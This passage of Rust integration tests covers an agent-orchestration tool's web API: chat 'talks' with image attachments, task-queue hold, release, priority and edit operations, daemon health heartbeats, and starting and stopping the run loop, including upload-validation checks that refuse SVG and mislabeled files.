5769
5770 #[tokio::test]
5771 async fn an_image_only_recovered_draft_resumes_without_text() {
5772 let (_tmp, _repo, f) = talk_fixture().await;
5773 let id = f.post("/api/talks", None).await.json()["id"]
5774 .as_str()
5775 .expect("id")
5776 .to_owned();
5777 let uploaded = f
5778 .post_bytes(
5779 &format!("/api/talks/{id}/attachments"),
5780 &[("Content-Type", "image/png"), ("X-Filename", "saved.png")],
5781 PNG_BYTES,
5782 )
5783 .await;
5784 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
5785 let attachment = f
5786 .talks()
5787 .attachment_meta(&id, uploaded.json()["id"].as_str().expect("attachment id"))
5788 .expect("attachment metadata")
5789 .expect("stored attachment");
5790 let store = f.talks();
5791 let mut recovered = store.get(&id).expect("opened talk");
5792 talk::queue(&mut recovered, &store, "", vec![attachment]).expect("queue image only");
5793
5794 let resumed = f
5795 .post(&format!("/api/talks/{id}/pending/resume"), None)
5796 .await;
5797 assert_eq!(resumed.status, 202, "{}", resumed.body);
5798 for _ in 0..SETTLE_STEPS {
5799 if store.get(&id).expect("talk").turns.len() == 2 {
5800 break;
5801 }
5802 tokio::time::sleep(Duration::from_millis(10)).await;
5803 }
5804 let finished = store.get(&id).expect("finished talk");
5805 assert_eq!(finished.turns.len(), 2, "{finished:?}");
5806 assert!(finished.turns[0].body.is_empty());
5807 assert_eq!(finished.turns[0].attachments.len(), 1);
5808 assert!(finished.pending_attachments.is_empty());
5809 }
5810
5811 #[tokio::test]
5812 async fn closed_talk_refuses_pending_mutations_without_changing_the_record() {
5813 let (_tmp, _repo, f) = talk_fixture().await;
5814 let id = f.post("/api/talks", None).await.json()["id"]
5815 .as_str()
5816 .expect("id")
5817 .to_owned();
5818 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
5819 assert_eq!(closed.status, 200, "{}", closed.body);
5820 let before_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
5821 .expect("serialize closed talk");
5822 for (path, body) in [
5823 (format!("/api/talks/{id}/pending/resume"), None),
5824 (
5825 format!("/api/talks/{id}/pending/clear"),
5826 Some(r#"{"expected_text":"","expected_attachments":[]}"#),
5827 ),
5828 (
5829 format!("/api/talks/{id}/pending/edit"),
5830 Some(r#"{"text":"x","expected_text":"","expected_attachments":[]}"#),
5831 ),
5832 (format!("/api/talks/{id}/say"), Some(r#"{"text":"x"}"#)),
5833 ] {
5834 let response = f.post(&path, body).await;
5835 assert_eq!(response.status, 409, "{}", response.body);
5836 }
5837 let after_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
5838 .expect("serialize closed talk");
5839 assert_eq!(
5840 after_clear, before_clear,
5841 "clear must not rewrite a closed talk"
5842 );
5843 }
5844
5845 const SLOW_MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && sleep 0.3 && printf ok\"]\n";
5848
5849 #[tokio::test]
5850 async fn talks_report_independent_thinking_claims_and_queue_a_second_message() {
5851 let tmp = TempDir::new().expect("tempdir");
5852 let repo = tmp.path().join("repo");
5853 std::fs::create_dir_all(&repo).expect("repo dir");
5854 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
5855 let f = Fixture::with_repo(repo).await;
5856 let id_a = f.post("/api/talks", None).await.json()["id"]
5857 .as_str()
5858 .unwrap()
5859 .to_owned();
5860 let id_b = f.post("/api/talks", None).await.json()["id"]
5861 .as_str()
5862 .unwrap()
5863 .to_owned();
5864
5865 let a = f
5866 .post(&format!("/api/talks/{id_a}/say"), Some(r#"{"text":"a"}"#))
5867 .await;
5868 assert_eq!(a.status, 202, "{}", a.body);
5869 assert_eq!(a.json()["thinking"], true);
5870 let b = f
5871 .post(&format!("/api/talks/{id_b}/say"), Some(r#"{"text":"b"}"#))
5872 .await;
5873 assert_eq!(b.status, 202, "{}", b.body);
5874 assert_eq!(b.json()["thinking"], true);
5875
5876 let listed = f.get("/api/talks").await.json();
5877 for id in [&id_a, &id_b] {
5878 let view = listed
5879 .as_array()
5880 .unwrap()
5881 .iter()
5882 .find(|talk| talk["id"] == *id)
5883 .unwrap();
5884 assert_eq!(view["thinking"], true, "{listed}");
5885 }
5886 let repeated = f
5887 .post(
5888 &format!("/api/talks/{id_a}/say"),
5889 Some(r#"{"text":"again"}"#),
5890 )
5891 .await;
5892 assert_eq!(repeated.status, 202, "{}", repeated.body);
5893 assert_eq!(repeated.json()["pending"], "again");
5894 }
5895
5896 const PNG_BYTES: &[u8] = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR\x00\x00\x00\x01";
5899
5900 #[tokio::test]
5901 async fn a_png_attachment_upload_is_201_and_get_returns_it_with_nosniff() {
5902 let f = Fixture::start().await;
5903 let id = seed_talk(&f, "20260905-000000-a1b2", "open");
5904
5905 let res = f
5906 .post_bytes(
5907 &format!("/api/talks/{id}/attachments"),
5908 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
5909 PNG_BYTES,
5910 )
5911 .await;
5912 assert_eq!(res.status, 201, "{}", res.body);
5913 let body = res.json();
5914 assert_eq!(body["name"], "shot.png");
5915 assert_eq!(body["mime"], "image/png");
5916 assert_eq!(body["bytes"], PNG_BYTES.len());
5917 let att_id = body["id"].as_str().expect("id").to_owned();
5918 assert_eq!(
5919 att_id.len(),
5920 32,
5921 "the id must never be a client-suppliable path: {att_id}"
5922 );
5923
5924 let got = f
5925 .get(&format!("/api/talks/{id}/attachments/{att_id}"))
5926 .await;
5927 assert_eq!(got.status, 200, "{}", got.body);
5928 assert_eq!(got.header("content-type"), Some("image/png"));
5929 assert_eq!(got.header("x-content-type-options"), Some("nosniff"));
5930 assert_eq!(got.bytes, PNG_BYTES);
5931 }
5932
5933 #[tokio::test]
5934 async fn an_svg_a_text_file_and_an_oversized_upload_are_all_4xx() {
5935 let f = Fixture::start().await;
5936 let id = seed_talk(&f, "20260905-000000-c3d4", "open");
5937
5938 let svg = f
5941 .post_bytes(
5942 &format!("/api/talks/{id}/attachments"),
5943 &[("Content-Type", "image/svg+xml")],
5944 b"<svg xmlns=\"http://www.w3.org/2000/svg\"></svg>",
5945 )
5946 .await;
5947 assert!(
5948 (400..500).contains(&svg.status),
5949 "svg must be refused: {} {}",
5950 svg.status,
5951 svg.body
5952 );
5953 assert!(svg.body.contains("SVG"), "{}", svg.body);
5954
5955 let text = f
5956 .post_bytes(
5957 &format!("/api/talks/{id}/attachments"),
5958 &[("Content-Type", "text/plain")],
5959 b"just some text",
5960 )
5961 .await;
5962 assert!(
5963 (400..500).contains(&text.status),
5964 "an unlisted type must be refused: {} {}",
5965 text.status,
5966 text.body
5967 );
5968
5969 let oversized = vec![0u8; ATTACHMENT_MAX_BYTES + 1];
5972 let big = f
5973 .post_bytes(
5974 &format!("/api/talks/{id}/attachments"),
5975 &[("Content-Type", "image/png")],
5976 &oversized,
5977 )
5978 .await;
5979 assert_eq!(
5980 big.status,
5981 StatusCode::PAYLOAD_TOO_LARGE.as_u16(),
5982 "{}",
5983 big.body
5984 );
5985 }
5986
5987 #[tokio::test]
5988 async fn a_mislabeled_upload_is_refused_even_though_the_declared_type_is_on_the_whitelist() {
5989 let f = Fixture::start().await;
5990 let id = seed_talk(&f, "20260905-000000-d4e5", "open");
5991
5992 let res = f
5995 .post_bytes(
5996 &format!("/api/talks/{id}/attachments"),
5997 &[("Content-Type", "image/png")],
5998 b"<html>not a picture</html>",
5999 )
6000 .await;
6001 assert!((400..500).contains(&res.status), "{}", res.body);
6002 }
6003
6004 #[tokio::test]
6005 async fn an_unknown_attachment_id_is_a_404() {
6006 let f = Fixture::start().await;
6007 let id = seed_talk(&f, "20260905-000000-e5f6", "open");
6008
6009 let res = f
6010 .get(&format!("/api/talks/{id}/attachments/{}", "0".repeat(32)))
6011 .await;
6012 assert_eq!(res.status, 404, "{}", res.body);
6013 }
6014
6015 #[tokio::test]
6016 async fn talk_say_with_only_an_attachment_and_no_body_is_accepted_and_persists() {
6017 let f = Fixture::start().await;
6018 let id = seed_talk(&f, "20260905-000000-f6a7", "open");
6019
6020 let uploaded = f
6021 .post_bytes(
6022 &format!("/api/talks/{id}/attachments"),
6023 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6024 PNG_BYTES,
6025 )
6026 .await;
6027 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6028 let att_id = uploaded.json()["id"].as_str().expect("id").to_owned();
6029
6030 let res = f
6031 .post(
6032 &format!("/api/talks/{id}/say"),
6033 Some(&format!(r#"{{"text":"","attachments":["{att_id}"]}}"#)),
6034 )
6035 .await;
6036 assert_eq!(res.status, 202, "{}", res.body);
6037 let queued = res.json();
6038 let turns = queued["turns"].as_array().expect("turns array");
6039 assert_eq!(
6040 turns.len(),
6041 1,
6042 "an empty body with an attachment is still a turn: {queued}"
6043 );
6044 assert_eq!(turns[0]["who"], "operator");
6045 assert_eq!(turns[0]["body"], "");
6046 let atts = turns[0]["attachments"]
6047 .as_array()
6048 .expect("attachments array");
6049 assert_eq!(atts.len(), 1);
6050 assert_eq!(atts[0]["id"], att_id);
6051 assert_eq!(atts[0]["mime"], "image/png");
6052
6053 let on_disk = f.talks().get(&id).expect("get");
6056 assert_eq!(on_disk.turns[0].attachments.len(), 1);
6057 assert_eq!(on_disk.turns[0].attachments[0].id, att_id);
6058 }
6059
6060 #[tokio::test]
6061 async fn saying_with_an_unknown_attachment_id_is_a_4xx_and_records_nothing() {
6062 let f = Fixture::start().await;
6063 let id = seed_talk(&f, "20260905-000000-a7b8", "open");
6064
6065 let res = f
6066 .post(
6067 &format!("/api/talks/{id}/say"),
6068 Some(&format!(
6069 r#"{{"text":"hi","attachments":["{}"]}}"#,
6070 "a".repeat(32)
6071 )),
6072 )
6073 .await;
6074 assert!((400..500).contains(&res.status), "{}", res.body);
6075 assert!(res.body.contains("unknown attachment"), "{}", res.body);
6076
6077 let on_disk = f.talks().get(&id).expect("get");
6078 assert!(
6079 on_disk.turns.is_empty(),
6080 "a rejected attachment id must not partially record the turn: {:?}",
6081 on_disk.turns
6082 );
6083 }
6084
6085 #[tokio::test]
6086 async fn talk_close_makes_the_talk_refuse_further_turns() {
6087 let f = Fixture::start().await;
6088 let id = seed_talk(&f, "20260904-014455-cd34", "open");
6089
6090 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6091 assert_eq!(closed.status, 200, "{}", closed.body);
6092 assert_eq!(closed.json()["status"], "closed");
6093
6094 let closed_again = f.post(&format!("/api/talks/{id}/close"), None).await;
6096 assert_eq!(closed_again.status, 200);
6097 assert_eq!(closed_again.json()["status"], "closed");
6098
6099 let said = f
6100 .post(
6101 &format!("/api/talks/{id}/say"),
6102 Some(r#"{"text":"too late"}"#),
6103 )
6104 .await;
6105 assert_eq!(said.status, 409, "{}", said.body);
6106 }
6107
6108 #[tokio::test]
6109 async fn talk_reopen_lets_a_closed_talk_take_turns_again_and_is_idempotent() {
6110 let (_tmp, _repo, f) = talk_fixture().await;
6111 let id = f.post("/api/talks", None).await.json()["id"]
6112 .as_str()
6113 .expect("id")
6114 .to_owned();
6115 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6116 assert_eq!(closed.status, 200, "{}", closed.body);
6117
6118 let reopened = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6119 assert_eq!(reopened.status, 200, "{}", reopened.body);
6120 assert_eq!(reopened.json()["status"], "open");
6121
6122 let reopened_again = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6124 assert_eq!(reopened_again.status, 200);
6125 assert_eq!(reopened_again.json()["status"], "open");
6126
6127 let said = f
6128 .post(
6129 &format!("/api/talks/{id}/say"),
6130 Some(r#"{"text":"still there?"}"#),
6131 )
6132 .await;
6133 assert_eq!(
6134 said.status, 202,
6135 "a reopened talk accepts turns again: {}",
6136 said.body
6137 );
6138 }
6139
6140 #[tokio::test]
6141 async fn talk_reopen_on_an_unknown_id_is_404() {
6142 let f = Fixture::start().await;
6143 let res = f.post("/api/talks/nonexistent-id/reopen", None).await;
6144 assert_eq!(res.status, 404, "{}", res.body);
6145 }
6146
6147 #[tokio::test]
6148 async fn talk_delete_removes_the_talk_from_disk_and_the_list() {
6149 let f = Fixture::start().await;
6150 let id = seed_talk(&f, "20260904-014455-ef56", "closed");
6151
6152 let deleted = f.delete(&format!("/api/talks/{id}")).await;
6153 assert_eq!(deleted.status, 204, "{}", deleted.body);
6154
6155 let after = f.get(&format!("/api/talks/{id}")).await;
6156 assert_eq!(after.status, 404, "{}", after.body);
6157
6158 let listed = f.get("/api/talks").await.json();
6159 assert!(
6160 listed.as_array().unwrap().iter().all(|t| t["id"] != id),
6161 "a deleted talk must not linger in the list: {listed}"
6162 );
6163 }
6164
6165 #[tokio::test]
6166 async fn talk_delete_on_an_unknown_id_is_404() {
6167 let f = Fixture::start().await;
6168 let res = f.delete("/api/talks/nonexistent-id").await;
6169 assert_eq!(res.status, 404, "{}", res.body);
6170 }
6171
6172 #[tokio::test]
6173 async fn holding_then_releasing_returns_a_task_to_the_loop_with_a_fresh_budget() {
6174 let f = Fixture::start().await;
6175 let queue = f.queue();
6176 let mut task = Task::new(
6177 "spent".to_owned(),
6178 "Try again".to_owned(),
6179 PathBuf::from("/repo/magi"),
6180 Source::Human,
6181 );
6182 task.start("20260902-140502-bbbb".to_owned());
6183 task.fail("agent gave up", 9);
6184 queue.put(&mut task).expect("file the task");
6185
6186 let held = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6187 assert_eq!(held.status, 200);
6188 assert_eq!(held.json()["status_str"], "held");
6189
6190 let released = f
6191 .post(&format!("/api/queue/{}/release", task.id), None)
6192 .await;
6193 assert_eq!(released.status, 200);
6194 assert_eq!(released.json()["status_str"], "queued");
6195 assert_eq!(
6196 released.json()["attempts"],
6197 0,
6198 "release is a real second chance, not an instant re-hold"
6199 );
6200 assert_eq!(
6201 queue.get(&task.id).expect("reload").status,
6202 TaskStatus::Queued,
6203 "the change is on disk, not only in the reply"
6204 );
6205 assert!(
6206 !f.home
6207 .path()
6208 .join("queue")
6209 .join(format!("{}.lock", task.id))
6210 .exists(),
6211 "the claim the mutation took is released again"
6212 );
6213 }
6214
6215 #[tokio::test]
6216 async fn a_task_a_daemon_is_running_cannot_be_changed_from_the_phone() {
6217 let f = Fixture::start().await;
6218 let queue = f.queue();
6219 let mut task = Task::new(
6220 "busy".to_owned(),
6221 "Running right now".to_owned(),
6222 PathBuf::from("/repo/magi"),
6223 Source::Human,
6224 );
6225 queue.put(&mut task).expect("file the task");
6226 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6227
6228 let res = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6229
6230 assert_eq!(res.status, 409);
6231 assert_eq!(
6232 queue.get(&task.id).expect("reload").status,
6233 TaskStatus::Queued,
6234 "the refused hold changed nothing"
6235 );
6236 }
6237
6238 #[tokio::test]
6239 async fn holding_with_a_reason_reads_back_from_show_and_the_card_and_release_clears_it() {
6240 let f = Fixture::start().await;
6241 let queue = f.queue();
6242 let mut task = Task::new(
6243 "waiting on the migration".to_owned(),
6244 "Do the thing".to_owned(),
6245 PathBuf::from("/repo/magi"),
6246 Source::Human,
6247 );
6248 queue.put(&mut task).expect("file the task");
6249
6250 let held = f
6251 .post(
6252 &format!("/api/queue/{}/hold", task.id),
6253 Some(r#"{"reason":"waiting for 20260101-000000-aaaa to land"}"#),
6254 )
6255 .await;
6256 assert_eq!(held.status, 200, "{}", held.body);
6257 assert_eq!(held.json()["status_str"], "held");
6258 assert_eq!(
6259 held.json()["hold_reason"],
6260 "waiting for 20260101-000000-aaaa to land"
6261 );
6262
6263 let listed = f.get("/api/queue").await.json();
6264 assert_eq!(
6265 listed[0]["hold_reason"], "waiting for 20260101-000000-aaaa to land",
6266 "the card reads the reason off the same list route"
6267 );
6268
6269 let mut plain = Task::new(
6272 "no reason given".to_owned(),
6273 "Do another thing".to_owned(),
6274 PathBuf::from("/repo/magi"),
6275 Source::Human,
6276 );
6277 queue.put(&mut plain).expect("file the task");
6278 let held_plain = f.post(&format!("/api/queue/{}/hold", plain.id), None).await;
6279 assert_eq!(held_plain.status, 200, "{}", held_plain.body);
6280 assert!(held_plain.json()["hold_reason"].is_null());
6281
6282 let released = f
6283 .post(&format!("/api/queue/{}/release", task.id), None)
6284 .await;
6285 assert_eq!(released.status, 200);
6286 assert!(
6287 released.json()["hold_reason"].is_null(),
6288 "a release must clear the reason so the next hold does not inherit it"
6289 );
6290 }
6291
6292 #[tokio::test]
6293 async fn priority_can_be_raised_from_the_phone_and_moves_the_task_ahead() {
6294 let f = Fixture::start().await;
6295 let queue = f.queue();
6296 let mut older = Task::new(
6297 "filed first".to_owned(),
6298 "x".to_owned(),
6299 PathBuf::from("/repo/magi"),
6300 Source::Human,
6301 );
6302 older.id = "20260101-000001-aaaa".to_owned();
6303 let mut newer = Task::new(
6304 "filed second".to_owned(),
6305 "x".to_owned(),
6306 PathBuf::from("/repo/magi"),
6307 Source::Human,
6308 );
6309 newer.id = "20260101-000002-bbbb".to_owned();
6310 queue.put(&mut older).expect("file older");
6311 queue.put(&mut newer).expect("file newer");
6312
6313 let before = f.get("/api/queue").await.json();
6316 assert_eq!(before[0]["id"], newer.id);
6317 assert_eq!(before[1]["id"], older.id);
6318
6319 let raised = f
6323 .post(
6324 &format!("/api/queue/{}/priority", older.id),
6325 Some(r#"{"priority":10}"#),
6326 )
6327 .await;
6328 assert_eq!(raised.status, 200, "{}", raised.body);
6329 assert_eq!(raised.json()["priority"], 10);
6330
6331 let after = f.get("/api/queue").await.json();
6332 let names: Vec<&str> = after
6333 .as_array()
6334 .unwrap()
6335 .iter()
6336 .map(|t| t["id"].as_str().unwrap())
6337 .collect();
6338 assert_eq!(names[0], older.id, "the raised task now sorts first");
6342 }
6343
6344 #[tokio::test]
6345 async fn priority_is_refused_on_a_running_task_with_a_reason_in_the_body() {
6346 let f = Fixture::start().await;
6347 let queue = f.queue();
6348 let mut task = Task::new(
6349 "in flight".to_owned(),
6350 "x".to_owned(),
6351 PathBuf::from("/repo/magi"),
6352 Source::Human,
6353 );
6354 task.start("20260902-140502-bbbb".to_owned());
6355 queue.put(&mut task).expect("file the task");
6356
6357 let res = f
6358 .post(
6359 &format!("/api/queue/{}/priority", task.id),
6360 Some(r#"{"priority":9}"#),
6361 )
6362 .await;
6363 assert_eq!(res.status, 400, "{}", res.body);
6364 assert!(
6365 res.json()["error"]
6366 .as_str()
6367 .is_some_and(|e| e.contains("running")),
6368 "{}",
6369 res.body
6370 );
6371 assert_eq!(
6372 queue.get(&task.id).expect("reload").priority,
6373 0,
6374 "the refused write must not partially apply"
6375 );
6376 }
6377
6378 #[tokio::test]
6379 async fn editing_replaces_title_and_instruction_and_keeps_id_created_at_source_and_runs() {
6380 let f = Fixture::start().await;
6381 let queue = f.queue();
6382 let mut task = Task::new(
6383 "old title".to_owned(),
6384 "old instruction".to_owned(),
6385 PathBuf::from("/repo/magi"),
6386 Source::Agent {
6387 run: "20260101-000000-beef".to_owned(),
6388 node: "implement".to_owned(),
6389 },
6390 );
6391 task.runs.push("20260101-000000-beef".to_owned());
6392 queue.put(&mut task).expect("file the task");
6393 let created_at = task.created_at;
6394
6395 let edited = f
6396 .post(
6397 &format!("/api/queue/{}/edit", task.id),
6398 Some(r#"{"title":"new title","instruction":"new instruction"}"#),
6399 )
6400 .await;
6401 assert_eq!(edited.status, 200, "{}", edited.body);
6402 let body = edited.json();
6403 assert_eq!(body["title"], "new title");
6404 assert_eq!(body["instruction"], "new instruction");
6405 assert_eq!(body["id"], task.id, "editing must not mint a new id");
6406 assert_eq!(body["created_at"], created_at.to_string());
6407 assert_eq!(
6408 body["source"]["kind"], "agent",
6409 "editing a task an agent filed must not turn it human: {body}"
6410 );
6411 assert_eq!(body["runs"], serde_json::json!(["20260101-000000-beef"]));
6412
6413 let reloaded = queue.get(&task.id).expect("reload");
6414 assert_eq!(reloaded.title, "new title");
6415 assert_eq!(reloaded.instruction, "new instruction");
6416 }
6417
6418 #[tokio::test]
6419 async fn editing_a_running_task_is_refused_with_a_reason_in_the_response() {
6420 let f = Fixture::start().await;
6421 let queue = f.queue();
6422 let mut task = Task::new(
6423 "in flight".to_owned(),
6424 "do not touch".to_owned(),
6425 PathBuf::from("/repo/magi"),
6426 Source::Human,
6427 );
6428 task.start("20260902-140502-bbbb".to_owned());
6429 queue.put(&mut task).expect("file the task");
6430
6431 let res = f
6432 .post(
6433 &format!("/api/queue/{}/edit", task.id),
6434 Some(r#"{"title":"x","instruction":"y"}"#),
6435 )
6436 .await;
6437 assert_eq!(res.status, 400, "{}", res.body);
6438 assert!(
6439 res.json()["error"]
6440 .as_str()
6441 .is_some_and(|e| e.contains("running")),
6442 "{}",
6443 res.body
6444 );
6445 assert_eq!(
6446 queue.get(&task.id).expect("reload").instruction,
6447 "do not touch",
6448 "the refused edit must not change the file"
6449 );
6450 }
6451
6452 #[tokio::test]
6453 async fn a_claimed_task_refuses_priority_and_edit_the_same_way_it_refuses_hold() {
6454 let f = Fixture::start().await;
6455 let queue = f.queue();
6456 let mut task = Task::new(
6457 "busy".to_owned(),
6458 "Running right now".to_owned(),
6459 PathBuf::from("/repo/magi"),
6460 Source::Human,
6461 );
6462 queue.put(&mut task).expect("file the task");
6463 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6464
6465 let priority = f
6466 .post(
6467 &format!("/api/queue/{}/priority", task.id),
6468 Some(r#"{"priority":9}"#),
6469 )
6470 .await;
6471 assert_eq!(priority.status, 409, "{}", priority.body);
6472
6473 let edit = f
6474 .post(
6475 &format!("/api/queue/{}/edit", task.id),
6476 Some(r#"{"title":"x","instruction":"y"}"#),
6477 )
6478 .await;
6479 assert_eq!(edit.status, 409, "{}", edit.body);
6480 }
6481
6482 #[tokio::test]
6483 async fn done_from_the_phone_keeps_runs_source_and_created_at_unlike_delete() {
6484 let f = Fixture::start().await;
6485 let queue = f.queue();
6486 let mut task = Task::new(
6487 "shipped by hand".to_owned(),
6488 "merged outside the loop".to_owned(),
6489 PathBuf::from("/repo/magi"),
6490 Source::Agent {
6491 run: "20260101-000000-b455".to_owned(),
6492 node: "implement".to_owned(),
6493 },
6494 );
6495 task.runs.push("20260101-000000-b455".to_owned());
6496 task.runs.push("20260101-000000-9af4".to_owned());
6497 queue.put(&mut task).expect("file the task");
6498 let created_at = task.created_at;
6499
6500 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6501 assert_eq!(done.status, 200, "{}", done.body);
6502 assert_eq!(done.json()["status_str"], "done");
6503
6504 let reloaded = queue.get(&task.id).expect("a done task is still on disk");
6505 assert_eq!(
6506 reloaded.runs,
6507 ["20260101-000000-b455", "20260101-000000-9af4"]
6508 );
6509 assert_eq!(
6510 reloaded.source,
6511 Source::Agent {
6512 run: "20260101-000000-b455".to_owned(),
6513 node: "implement".to_owned(),
6514 }
6515 );
6516 assert_eq!(reloaded.created_at, created_at);
6517 }
6518
6519 #[tokio::test]
6520 async fn closing_a_held_task_as_done_from_the_phone_clears_its_hold_reason() {
6521 let f = Fixture::start().await;
6526 let queue = f.queue();
6527 let mut task = Task::new(
6528 "landed while held".to_owned(),
6529 "x".to_owned(),
6530 PathBuf::from("/repo/magi"),
6531 Source::Human,
6532 );
6533 task.hold_manual(Some("waiting on 3ed9".to_owned()));
6534 queue.put(&mut task).expect("file the held task");
6535
6536 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6537 assert_eq!(done.status, 200, "{}", done.body);
6538 assert_eq!(done.json()["status_str"], "done");
6539 assert!(
6540 done.json()["hold_reason"].is_null(),
6541 "a done task cannot still be waiting on something: {}",
6542 done.body
6543 );
6544 }
6545
6546 #[tokio::test]
6547 async fn unknown_ids_are_json_not_found_on_both_stores() {
6548 let f = Fixture::start().await;
6549
6550 let run = f.get("/api/runs/nosuchrun").await;
6551 let task = f.post("/api/queue/nosuchtask/hold", None).await;
6552
6553 assert_eq!(run.status, 404);
6554 assert_eq!(task.status, 404);
6555 assert!(
6556 run.json()["error"]
6557 .as_str()
6558 .is_some_and(|e| e.contains("run")),
6559 "the error names what was not found: {}",
6560 run.body
6561 );
6562 assert!(
6563 task.json()["error"]
6564 .as_str()
6565 .is_some_and(|e| e.contains("task")),
6566 "the error names what was not found: {}",
6567 task.body
6568 );
6569 }
6570
6571 #[tokio::test]
6572 async fn the_daemon_counts_as_running_only_while_its_heartbeat_is_fresh() {
6573 let f = Fixture::start().await;
6574
6575 let missing = f.get("/api/health").await.json();
6576 assert_eq!(missing["daemon"]["running"], false, "no file, no daemon");
6577
6578 write_daemon(
6579 f.home.path(),
6580 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6581 );
6582 let stale = f.get("/api/health").await.json();
6583 assert_eq!(
6584 stale["daemon"]["running"], false,
6585 "a minute without a heartbeat is a dead daemon, not a busy one"
6586 );
6587 assert!(
6588 stale["daemon"]["stale_for_secs"]
6589 .as_i64()
6590 .is_some_and(|s| s >= 55),
6591 "staleness is reported so the UI can say how long: {stale}"
6592 );
6593
6594 write_daemon(f.home.path(), Timestamp::now());
6595 let fresh = f.get("/api/health").await.json();
6596 assert_eq!(fresh["daemon"]["running"], true);
6597 assert_eq!(fresh["daemon"]["idle"], false);
6598 assert_eq!(fresh["daemon"]["pid"], 4242);
6599 assert_eq!(fresh["daemon"]["completed"], 7);
6600 assert_eq!(
6601 fresh["daemon"]["current"][0]["task"],
6602 "20260902-140501-aaaa"
6603 );
6604 assert_eq!(fresh["version"], env!("CARGO_PKG_VERSION"));
6605 }
6606
6607 #[tokio::test]
6608 async fn the_loop_is_not_running_until_something_starts_it() {
6609 let f = Fixture::start().await;
6610
6611 let view = f.get("/api/loop").await.json();
6612 assert_eq!(view["running"], false);
6613 assert_eq!(
6614 view["owned"], false,
6615 "nobody owns a loop that does not exist: {view}"
6616 );
6617 assert_eq!(view["stopping"], false);
6618 assert_eq!(view["last_error"], Value::Null);
6619 assert_eq!(view["daemon"]["running"], false);
6620 assert_eq!(
6621 view["repo"], "/repo/magi",
6622 "the repository a start would use, named before it is started"
6623 );
6624 }
6625
6626 #[tokio::test]
6627 async fn starting_the_loop_runs_it_in_this_process_and_health_says_the_same() {
6628 let f = Fixture::start().await;
6629
6630 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6631 assert_eq!(res.status, 200, "{}", res.body);
6632 let view = res.json();
6633 assert_eq!(view["running"], true);
6634 assert_eq!(
6635 view["owned"], true,
6636 "the loop the UI started is the UI's own to stop: {view}"
6637 );
6638 assert_eq!(
6639 view["merge"],
6640 Value::Null,
6641 "no override was given, so each repository's own config decides"
6642 );
6643
6644 let health = f.get("/api/health").await.json();
6648 assert_eq!(health["loop"]["running"], true, "{health}");
6649 assert_eq!(health["loop"]["owned"], true, "{health}");
6650
6651 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6652 }
6653
6654 #[tokio::test]
6655 async fn a_second_start_is_refused_rather_than_racing_the_first_for_claims() {
6656 let f = Fixture::start().await;
6657 let first = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6658 assert_eq!(first.status, 200, "{}", first.body);
6659
6660 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6661 assert_eq!(
6662 again.status, 409,
6663 "two loops on one queue race for the same claims: {}",
6664 again.body
6665 );
6666 assert!(
6667 again.json()["error"]
6668 .as_str()
6669 .is_some_and(|e| e.contains("already running the loop")),
6670 "the refusal has to say why: {}",
6671 again.body
6672 );
6673 assert_eq!(
6674 f.get("/api/loop").await.json()["running"],
6675 true,
6676 "and the loop that was already running is untouched by it"
6677 );
6678
6679 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6680 }
6681
6682 #[tokio::test]
6683 async fn stopping_answers_at_once_and_the_loop_settles_stopped() {
6684 let f = Fixture::start().await;
6685 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6686
6687 let res = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6688 assert_eq!(
6689 res.status, 200,
6690 "the answer must not wait for the loop: a run in flight is tens of \
6691 minutes and the operator is holding a phone: {}",
6692 res.body
6693 );
6694
6695 let view = settled(&f, |v| v["running"] == false).await;
6696 assert_eq!(view["owned"], false);
6697 assert_eq!(
6698 view["stopping"], false,
6699 "a loop that has stopped is not still stopping: {view}"
6700 );
6701 assert_eq!(
6702 view["last_error"],
6703 Value::Null,
6704 "a loop that was asked to stop did not fail: {view}"
6705 );
6706
6707 let twice = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6710 assert_eq!(twice.status, 200, "{}", twice.body);
6711 }
6712
6713 #[tokio::test]
6714 async fn a_loop_another_process_owns_can_be_neither_started_nor_stopped_here() {
6715 let f = Fixture::start().await;
6716 write_daemon(f.home.path(), Timestamp::now());
6719
6720 let view = f.get("/api/loop").await.json();
6721 assert_eq!(view["running"], false, "not in this process: {view}");
6722 assert_eq!(view["owned"], false, "and not this process's to control");
6723 assert_eq!(
6724 view["daemon"]["running"], true,
6725 "but a loop is alive somewhere, which is what the UI must say"
6726 );
6727 assert_eq!(view["daemon"]["pid"], 4242);
6728
6729 for body in [r#"{"running":true}"#, r#"{"running":false}"#] {
6730 let res = f.post("/api/loop", Some(body)).await;
6731 assert_eq!(
6732 res.status, 409,
6733 "neither button may pretend to work on someone else's loop: {}",
6734 res.body
6735 );
6736 assert!(
6737 res.json()["error"]
6738 .as_str()
6739 .is_some_and(|e| e.contains("4242")),
6740 "the refusal has to name the process the operator must go to: {}",
6741 res.body
6742 );
6743 }
6744 assert_eq!(
6745 f.get("/api/loop").await.json()["running"],
6746 false,
6747 "and the refusal started nothing"
6748 );
6749 }
6750
6751 #[tokio::test]
